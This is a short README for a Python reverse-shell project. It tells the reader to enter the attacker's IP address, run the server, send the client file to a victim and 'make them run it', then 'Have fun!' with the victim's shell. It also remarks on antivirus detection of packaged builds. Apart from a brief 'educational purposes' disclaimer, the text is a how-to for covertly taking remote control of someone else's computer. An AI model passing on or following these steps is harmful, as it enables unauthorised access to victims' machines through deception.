Python reverse shell. Simplistic application and embedment.
This repository is for my latest project, a reverse shell made in Python. A reverse shell opens a server in the attacker's computer and connects the victim of the attack. Please use this for only educational purposes. You are responsible for any illegal action made with this project.
You may package this with pyinstaller, but Windows Defender will most likely be able to detect it.
- Go to the Releases section, or clone the repository (git clone)
- Use the Update.exe and enter your local IPV4 address, or change it in client/config/config.json.
- Go to the server directory, and run server.py
- Using any method, send the client.pyw file to the victim, and make them run it.
- You have connected to the victim's shell. Have fun!
